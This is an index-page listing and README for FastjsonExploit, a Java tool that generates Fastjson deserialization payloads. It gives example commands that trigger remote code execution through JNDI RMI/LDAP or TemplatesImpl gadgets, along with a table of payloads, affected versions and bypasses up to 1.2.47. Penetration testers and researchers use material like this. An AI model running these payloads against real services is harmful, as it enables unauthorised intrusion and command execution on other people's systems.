Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/c0ny1/FastjsonExploit
Fastjson vulnerability quickly exploits the framework(fastjson漏洞快速利用框架)
https://github.com/c0ny1/FastjsonExploit
exp exploiting-vulnerabilities fastjson poc
Last synced: about 2 months ago
JSON representation
Fastjson vulnerability quickly exploits the framework(fastjson漏洞快速利用框架)
- Host: GitHub
- URL: https://github.com/c0ny1/FastjsonExploit
- Owner: c0ny1
- Created: 2019-07-20T04:55:57.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2022-12-16T03:56:54.000Z (almost 2 years ago)
- Last Synced: 2024-07-31T13:15:02.747Z (4 months ago)
- Topics: exp, exploiting-vulnerabilities, fastjson, poc
- Language: Java
- Homepage:
- Size: 15.5 MB
- Stars: 1,228
- Watchers: 15
- Forks: 168
- Open Issues: 8
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - c0ny1/FastjsonExploit - Fastjson vulnerability quickly exploits the framework(fastjson漏洞快速利用框架) (Java)
README
# FastjonExploit | Fastjson漏洞快速利用框架
## 0x01 Introduce
FastjsonExploit是一个Fastjson漏洞快速漏洞利用框架,主要功能如下:
1. 一键生成利用payload,并启动所有利用环境。
2. 管理Fastjson各种payload(当然是立志整理所有啦,目前6个类,共11种利用及绕过)## 0x02 Buiding
Requires Java 1.7+ and Maven 3.x+
```mvn clean package -DskipTests```
## 0x03 Usage
```
.---- -. -. . . .
( .',----- - - ' '
\_/ ;--:-\ __--------------------__
__U__n_^_''__[. |ooo___ | |_!_||_!_||_!_||_!_| |
c(_ ..(_ ..(_ ..( /,,,,,,] | |___||___||___||___| |
,_\___________'_|,L______],|______________________|
/;_(@)(@)==(@)(@) (o)(o) (o)^(o)--(o)^(o)FastjsonExploit is a Fastjson library vulnerability exploit framework
Author:c0ny1Usage: java -jar Fastjson-[version]-all.jar [payload] [option] [command]
Exp01: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 rmi://127.0.0.1:1099/Exploit "cmd:calc"
Exp02: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 ldap://127.0.0.1:1232/Exploit "code:custom_code.java"
Exp03: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "cmd:calc"
Exp04: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "code:custom_code.java"Available payload types:
Payload PayloadType VulVersion Dependencies
------- ----------- ---------- ------------
BasicDataSource1 local 1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4
BasicDataSource2 local 1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4
JdbcRowSetImpl1 jndi 1.2.2.1-1.2.2.4
JdbcRowSetImpl2 jndi 1.2.2.1-1.2.4.1 Fastjson 1.2.41 bypass
JdbcRowSetImpl3 jndi 1.2.2.1-1.2.4.3 Fastjson 1.2.43 bypass
JdbcRowSetImpl4 jndi 1.2.2.1-1.2.4.2 Fastjson 1.2.42 bypass
JdbcRowSetImpl5 jndi 1.2.2.1-1.2.4.7 Fastjson 1.2.47 bypass
JndiDataSourceFactory1 jndi 1.2.2.1-1.2.2.4 ibatis-core:3.0
SimpleJndiBeanFactory1 jndi 1.2.2.2-1.2.2.4 spring-context:4.3.7.RELEASE
TemplatesImpl1 local 1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)
TemplatesImpl2 local 1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)
```## 0x04 Notice
* 帮助信息所说明的payload可利用的Fastjson版本,不一定正确。后续测试更正!## 0x05 Reference
* https://github.com/frohoff/ysoserial
* https://github.com/mbechler/marshalsec
* https://github.com/kxcode/JNDI-Exploit-Bypass-Demo